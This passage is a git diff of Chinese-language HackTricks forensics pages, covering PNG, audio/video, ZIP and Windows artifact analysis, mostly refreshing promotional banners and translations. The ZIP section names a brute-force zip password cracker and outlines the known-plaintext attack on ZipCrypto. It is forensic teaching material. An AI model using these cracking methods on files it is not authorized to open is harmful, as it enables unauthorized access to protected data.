-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持 HackTricks -其他支持HackTricks的方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索我们的独家[**NFTs**]收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md index e3989ad36..36880efde 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md @@ -1,33 +1,20 @@ -
- -从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) - -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 - -
- -**PNG文件**在**CTF挑战**中备受推崇,因为它们具有**无损压缩**,非常适合嵌入隐藏数据。像**Wireshark**这样的工具通过解剖网络数据包中的PNG文件数据,可以分析PNG文件,揭示嵌入的信息或异常。 - -为了检查PNG文件的完整性并修复损坏,**pngcheck**是一个关键工具,提供命令行功能来验证和诊断PNG文件([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html))。当文件超出简单修复范围时,像[OfficeRecovery的PixRecovery](https://online.officerecovery.com/pixrecovery/)这样的在线服务提供了一个基于Web的解决方案,用于**修复损坏的PNG文件**,帮助CTF参与者恢复关键数据。 - -这些策略强调了在CTF中采用综合方法的重要性,利用分析工具和修复技术的结合来揭示和恢复隐藏或丢失的数据。 +{% hint style="success" %} +学习并练习AWS黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP黑客技术:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} + +**PNG 文件** 在 **CTF 挑战** 中备受推崇,因为它们具有**无损压缩**,非常适合嵌入隐藏数据。像 **Wireshark** 这样的工具通过解剖网络数据包中的 PNG 文件数据,可以分析 PNG 文件,揭示嵌入的信息或异常。 + +为了检查 PNG 文件的完整性并修复损坏,**pngcheck** 是一个关键工具,提供命令行功能来验证和诊断 PNG 文件 ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html))。当文件超出简单修复范围时,像 [OfficeRecovery's PixRecovery](https://online.officerecovery.com/pixrecovery/) 这样的在线服务提供了一个基于 Web 的解决方案,用于**修复损坏的 PNG 文件**,帮助 CTF 参与者恢复关键数据。 + +这些策略强调了在 CTF 中采用综合方法的重要性,利用分析工具和修复技术的结合来揭示和恢复隐藏或丢失的数据。 diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md index 1fbac1c16..0644e376d 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md @@ -1,18 +1,19 @@ +{% hint style="success" %} +学习并练习AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} -**音频和视频文件处理**是CTF取证挑战中的基本技术,利用**隐写术**和元数据分析来隐藏或揭示秘密消息。工具如**[mediainfo](https://mediaarea.net/en/MediaInfo)**和**`exiftool`**对检查文件元数据和识别内容类型至关重要。 +**音频和视频文件处理**是**CTF取证挑战**中的基本技术,利用**隐写术**和元数据分析来隐藏或揭示秘密消息。工具如**[mediainfo](https://mediaarea.net/en/MediaInfo)**和**`exiftool`**对检查文件元数据和识别内容类型至关重要。 对于音频挑战,**[Audacity](http://www.audacityteam.org/)**是一个优秀的工具,可用于查看波形和分析频谱图,有助于揭示音频中编码的文本。**[Sonic Visualiser](http://www.sonicvisualiser.org/)**强烈推荐用于详细的频谱图分析。**Audacity**允许对音频进行操作,如减慢或倒放音轨以检测隐藏的消息。**[Sox](http://sox.sourceforge.net/)**是一个命令行实用程序,擅长转换和编辑音频文件。 @@ -20,22 +21,22 @@ 视频挑战通常涉及捆绑音频和视频流的容器格式。**[FFmpeg](http://ffmpeg.org/)**是分析和处理这些格式的首选工具,能够解复用和回放内容。对于开发人员,**[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)**将FFmpeg的功能集成到Python中,实现高级可脚本化交互。 -这些工具的组合突显了CTF挑战中所需的多功能性,参与者必须运用广泛的分析和处理技术来揭示音频和视频文件中的隐藏数据。 +这些工具的组合突显了CTF挑战中所需的多功能性,参与者必须运用广泛的分析和处理技术来揭示音频和视频文件中隐藏的数据。 -# 参考资料 +## 参考资料 * [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/) - + +{% hint style="success" %} +学习并练习AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md index 520cf47d3..1feb78317 100644 --- a/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md +++ b/forensics/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md @@ -1,30 +1,46 @@ -# ZIP技巧 +# ZIPs 技巧 + +{% hint style="success" %} +学习并练习 AWS 黑客技能:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习 GCP 黑客技能:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品 -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} -用于管理**zip文件**的**命令行工具**对于诊断、修复和破解zip文件至关重要。以下是一些关键的实用工具: +用于管理 **zip 文件** 的**命令行工具**对诊断、修复和破解 zip 文件至关重要。以下是一些关键的实用程序: -- **`unzip`**:显示zip文件无法解压缩的原因。 -- **`zipdetails -v`**:提供zip文件格式字段的详细分析。 -- **`zipinfo`**:列出zip文件的内容而不解压缩它们。 -- **`zip -F input.zip --out output.zip`** 和 **`zip -FF input.zip --out output.zip`**:尝试修复损坏的zip文件。 -- **[fcrackzip](https://github.com/hyc/fcrackzip)**:用于暴力破解zip密码的工具,对长达约7个字符的密码有效。 +- **`unzip`**:显示 zip 文件无法解压缩的原因。 +- **`zipdetails -v`**:提供 zip 文件格式字段的详细分析。 +- **`zipinfo`**:列出 zip 文件的内容而不解压缩它们。 +- **`zip -F input.zip --out output.zip`** 和 **`zip -FF input.zip --out output.zip`**:尝试修复损坏的 zip 文件。 +- **[fcrackzip](https://github.com/hyc/fcrackzip)**:一种用于暴力破解 zip 密码的工具,对长度约为 7 个字符的密码非常有效。 -[Zip文件格式规范](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT)提供了关于zip文件的结构和标准的详细信息。 +[Zip 文件格式规范](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT)提供了关于 zip 文件的结构和标准的全面详细信息。 -值得注意的是,受密码保护的zip文件**不会加密**其中的文件名或文件大小,这是与RAR或7z文件不同的安全漏洞,后者会加密这些信息。此外,使用旧的ZipCrypto方法加密的zip文件如果存在未加密的压缩文件副本,则容易受到**明文攻击**的影响。这种攻击利用已知内容来破解zip文件的密码,这一漏洞在[HackThis的文章](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files)中有详细说明,并在[这篇学术论文](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf)中进一步解释。然而,使用**AES-256**加密的zip文件不受这种明文攻击的影响,突显了为敏感数据选择安全加密方法的重要性。 +值得注意的是,受密码保护的 zip 文件**不会加密**其中的文件名或文件大小,这是与加密此信息的 RAR 或 7z 文件不同的安全漏洞。此外,使用旧的 ZipCrypto 方法加密的 zip 文件如果存在未加密的压缩文件副本,则容易受到**明文攻击**的影响。这种攻击利用已知内容来破解 zip 的密码,这一漏洞在 [HackThis 的文章](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files) 中有详细说明,并在 [这篇学术论文](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf) 中进一步解释。然而,使用 **AES-256** 加密的 zip 文件对这种明文攻击免疫,突显了为敏感数据选择安全加密方法的重要性。 -# 参考资料 +## 参考资料 * [https://michael-myers.github.io/blog/categories/ctf/](https://michael-myers.github.io/blog/categories/ctf/) + +{% hint style="success" %} +学习并练习 AWS 黑客技能:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习 GCP 黑客技能:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +支持 HackTricks + +* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。 + +
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/windows-forensics/README.md b/forensics/basic-forensic-methodology/windows-forensics/README.md index 3fc915b2c..70406ee8a 100644 --- a/forensics/basic-forensic-methodology/windows-forensics/README.md +++ b/forensics/basic-forensic-methodology/windows-forensics/README.md @@ -2,19 +2,20 @@ ## Windows取证物 +{% hint style="success" %} +学习并练习AWS Hacking:[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP Hacking:[**HackTricks培训GCP红队专家(GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS Red Team Expert) +支持HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享黑客技巧。
+{% endhint %}
@@ -24,19 +25,19 @@ ### Windows 10通知 -在路径`\Users\<用户名>\AppData\Local\Microsoft\Windows\Notifications`中,您可以找到数据库`appdb.dat`(Windows周年更新前)或`wpndatabase.db`(Windows周年更新后)。 +在路径`\Users\\AppData\Local\Microsoft\Windows\Notifications`中,您可以找到数据库`appdb.dat`(Windows周年纪念版之前)或`wpndatabase.db`(Windows周年纪念版之后)。 -在这个SQLite数据库中,您可以找到包含有趣数据的所有通知(以XML格式)的`Notification`表。 +在这个SQLite数据库中,您可以找到包含所有通知(以XML格式)的`Notification`表,其中可能包含有趣的数据。 ### 时间轴 时间轴是Windows的一个特性,提供了访问的网页、编辑的文档和执行的应用程序的**时间顺序历史记录**。 -数据库位于路径`\Users\<用户名>\AppData\Local\ConnectedDevicesPlatform\\ActivitiesCache.db`。可以使用SQLite工具或工具[**WxTCmd**](https://github.com/EricZimmerman/WxTCmd)打开此数据库,**该工具生成2个文件,可以使用工具**[**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md) **打开**。 +数据库位于路径`\Users\\AppData\Local\ConnectedDevicesPlatform\\ActivitiesCache.db`。可以使用SQLite工具或工具[**WxTCmd**](https://github.com/EricZimmerman/WxTCmd)打开此数据库,**该工具生成2个文件,可以使用工具**[**TimeLine Explorer**](https://ericzimmerman.github.io/#!index.md) **打开**。 ### ADS(备用数据流) -下载的文件可能包含**ADS Zone.Identifier**,指示它是如何从内部网络、互联网等下载的。一些软件(如浏览器)通常会放置**更多**的**信息**,如文件下载的**URL**。 +下载的文件可能包含**ADS Zone.Identifier**,指示它是如何从内部网络、互联网等下载的。一些软件(如浏览器)通常会放置**更多信息**,如文件下载的**URL**。 ## **文件备份** @@ -60,7 +61,7 @@ 阴影副本是包含在 Microsoft Windows 中的技术,可以在计算机文件或卷正在使用时创建**备份副本**或快照。 -这些备份通常位于文件系统根目录下的 `\System Volume Information` 中,名称由以下图片中显示的**UIDs**组成: +这些备份通常位于文件系统根目录下的 `\System Volume Information` 中,名称由以下图像中显示的**UIDs**组成: ![](<../../../.gitbook/assets/image (520).png>) @@ -89,9 +90,9 @@ Shell 项目是包含有关如何访问另一个文件的信息的项目。 * Win7-Win10: `C:\Users\\AppData\Roaming\Microsoft\Windows\Recent\` * Office: `C:\Users\\AppData\Roaming\Microsoft\Office\Recent\` -创建文件夹时,还会创建指向文件夹、父文件夹和祖父文件夹的链接。 +创建文件夹时,还会创建到文件夹、父文件夹和祖父文件夹的链接。 -这些自动创建的链接文件**包含有关源文件**是**文件**还是**文件夹**、该文件的**MAC时间**、文件存储位置的**卷信息**和**目标文件夹**的信息。这些信息可用于在文件被删除时恢复这些文件。 +这些自动创建的链接文件**包含有关源文件的信息**,例如它是**文件**还是**文件夹**,该文件的**MAC时间**,文件存储位置的**卷信息**和**目标文件夹**。这些信息可用于在文件被删除时恢复这些文件。 此外,链接文件的**创建日期**是原始文件**首次使用的时间**,链接文件的**修改日期**是原始文件**最后使用的时间**。 @@ -100,17 +101,17 @@ Shell 项目是包含有关如何访问另一个文件的信息的项目。 在此工具中,您将找到**2组**时间戳: * **第一组:** -1. FileModifiedDate -2. FileAccessDate -3. FileCreationDate +1. 文件修改日期 +2. 文件访问日期 +3. 文件创建日期 * **第二组:** -1. LinkModifiedDate -2. LinkAccessDate -3. LinkCreationDate。 +1. 链接修改日期 +2. 链接访问日期 +3. 链接创建日期。 第一组时间戳引用**文件本身的时间戳**。第二组引用**链接文件的时间戳**。 -您可以使用 Windows CLI 工具获取相同的信息:[**LECmd.exe**](https://github.com/EricZimmerman/LECmd) +您可以使用 Windows CLI 工具获取相同信息:[**LECmd.exe**](https://github.com/EricZimmerman/LECmd) ``` LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs ``` @@ -118,9 +119,9 @@ LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs 这些是每个应用程序指示的最近文件。这是您可以在每个应用程序上访问的**最近使用的文件列表**。它们可以**自动创建或自定义**。 -自动创建的**跳转列表**存储在 `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\`。跳转列表的命名遵循格式 `{id}.autmaticDestinations-ms`,其中初始ID是应用程序的ID。 +自动生成的**跳转列表**存储在 `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\`。跳转列表的命名遵循格式 `{id}.autmaticDestinations-ms`,其中初始ID是应用程序的ID。 -自定义跳转列表存储在 `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\`,通常是由应用程序创建的,因为文件发生了**重要**事件(可能标记为收藏夹)。 +自定义跳转列表存储在 `C:\Users\{username}\AppData\Roaming\Microsoft\Windows\Recent\CustomDestination\`,它们通常是由应用程序创建的,因为文件发生了**重要**事件(可能标记为收藏夹)。 任何跳转列表的**创建时间**表示**文件首次访问的时间**,**修改时间表示最后一次访问的时间**。 @@ -136,13 +137,13 @@ LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs ## Windows USB的使用 -通过以下内容的创建,可以确定是否使用了USB设备: +通过以下内容的创建,可以确定已使用USB设备: * Windows最近文件夹 * Microsoft Office最近文件夹 * 跳转列表 -请注意,有些LNK文件指向WPDNSE文件夹而不是原始路径: +请注意,某些LNK文件指向WPDNSE文件夹而不是原始路径: ![](<../../../.gitbook/assets/image (476).png>) @@ -156,17 +157,17 @@ LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs 检查文件 `C:\Windows\inf\setupapi.dev.log` 可以获取有关USB连接产生的时间戳(搜索 `Section start`)。 -![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>) +![](<../../../.gitbook/assets/image (477) (2) (2) (2) (2) (2) (2) (2) (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (14).png>) ### USB Detective -[**USBDetective**](https://usbdetective.com) 可用于获取连接到图像的USB设备的信息。 +[**USBDetective**](https://usbdetective.com) 可用于获取已连接到图像的USB设备的信息。 ![](<../../../.gitbook/assets/image (483).png>) ### 插拔清理 -名为“插拔清理”的计划任务主要用于删除过时的驱动程序版本。与保留最新驱动程序包版本的指定目的相反,在线资源表明它还针对过去30天未活动的驱动程序。因此,过去30天未连接的可移动设备的驱动程序可能会被删除。 +名为“插拔清理”的计划任务主要用于删除过时的驱动程序版本。与保留最新驱动程序包版本的指定目的相反,在线资源表明它还针对在过去30天内未连接的驱动程序。因此,未连接在过去30天内的可移动设备的驱动程序可能会被删除。 该任务位于以下路径: `C:\Windows\System32\Tasks\Microsoft\Windows\Plug and Play\Plug and Play Cleanup`。 @@ -181,9 +182,9 @@ LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs - **Period('P1M')**:指示任务计划程序在常规自动维护期间每月启动清理任务。 - **Deadline('P2M')**:如果任务连续两个月失败,则指示任务计划程序在紧急自动维护期间执行任务。 -此配置确保定期维护和清理驱动程序,并在连续失败的情况下重新尝试任务。 +此配置确保定期维护和清理驱动程序,并提供在连续失败的情况下重新尝试任务的规定。 -**更多信息请查看:** [**https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html**](https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html) +**更多信息,请查看:** [**https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html**](https://blog.1234n6.com/2018/07/windows-plug-and-play-cleanup.html) ## 电子邮件 @@ -206,14 +207,14 @@ LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs ### Microsoft Outlook -当使用Exchange服务器或Outlook客户端时,将会有一些MAPI标题: +当使用Exchange服务器或Outlook客户端时,将会有一些MAPI头: -* `Mapi-Client-Submit-Time`:发送电子邮件时的系统时间 -* `Mapi-Conversation-Index`:线程的子消息数量和每个线程消息的时间戳 +* `Mapi-Client-Submit-Time`:发送电子邮件时系统的时间 +* `Mapi-Conversation-Index`:线程的子消息数量以及线程的每条消息的时间戳 * `Mapi-Entry-ID`:消息标识符。 -* `Mappi-Message-Flags` 和 `Pr_last_Verb-Executed`:有关MAPI客户端的信息(消息已读?未读?已回复?已重定向?已设置为离开办公室?) +* `Mappi-Message-Flags`和`Pr_last_Verb-Executed`:有关MAPI客户端的信息(消息已读?未读?已回复?已重定向?已设置为离开办公室?) -在Microsoft Outlook客户端中,所有已发送/接收的消息、联系人数据和日历数据都存储在PST文件中: +在Microsoft Outlook客户端中,所有已发送/接收的消息、联系人数据和日历数据都存储在以下PST文件中: * `%USERPROFILE%\Local Settings\Application Data\Microsoft\Outlook`(WinXP) * `%USERPROFILE%\AppData\Local\Microsoft\Outlook` @@ -225,7 +226,7 @@ LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs ![](<../../../.gitbook/assets/image (485).png>) ### Microsoft Outlook OST Files -**OST文件**是由Microsoft Outlook在配置了**IMAP**或**Exchange**服务器时生成的,存储类似于PST文件的信息。该文件与服务器同步,保留**最近12个月**的数据,最大大小为**50GB**,位于与PST文件相同的目录中。要查看OST文件,可以使用[**Kernel OST viewer**](https://www.nucleustechnologies.com/ost-viewer.html)。 +**OST文件**是Microsoft Outlook在配置**IMAP**或**Exchange**服务器时生成的,存储类似于PST文件的信息。该文件与服务器同步,保留**最近12个月**的数据,最大大小为**50GB**,位于与PST文件相同的目录中。要查看OST文件,可以使用[**Kernel OST viewer**](https://www.nucleustechnologies.com/ost-viewer.html)。 ### 检索附件 @@ -248,9 +249,9 @@ LECmd.exe -d C:\Users\student\Desktop\LNKs --csv C:\Users\student\Desktop\LNKs Windows注册表存储广泛的系统和用户活动数据,包含在以下文件中: -- 对于各种`HKEY_LOCAL_MACHINE`子键,位于`%windir%\System32\Config`。 -- 对于`HKEY_CURRENT_USER`,位于`%UserProfile%{User}\NTUSER.DAT`。 -- Windows Vista及更高版本会在`%Windir%\System32\Config\RegBack\`中备份`HKEY_LOCAL_MACHINE`注册表文件。 +- 各种`HKEY_LOCAL_MACHINE`子键位于`%windir%\System32\Config`。 +- `HKEY_CURRENT_USER`位于`%UserProfile%{User}\NTUSER.DAT`。 +- Windows Vista及更高版本在`%Windir%\System32\Config\RegBack\`中备份`HKEY_LOCAL_MACHINE`注册表文件。 - 此外,程序执行信息存储在从Windows Vista和Windows 2008 Server开始的`%UserProfile%\{User}\AppData\Local\Microsoft\Windows\USERCLASS.DAT`中。 ### 工具 @@ -258,13 +259,13 @@ Windows注册表存储广泛的系统和用户活动数据,包含在以下文 一些工具可用于分析注册表文件: * **注册表编辑器**:已安装在Windows中。它是一个GUI,可用于浏览当前会话的Windows注册表。 -* 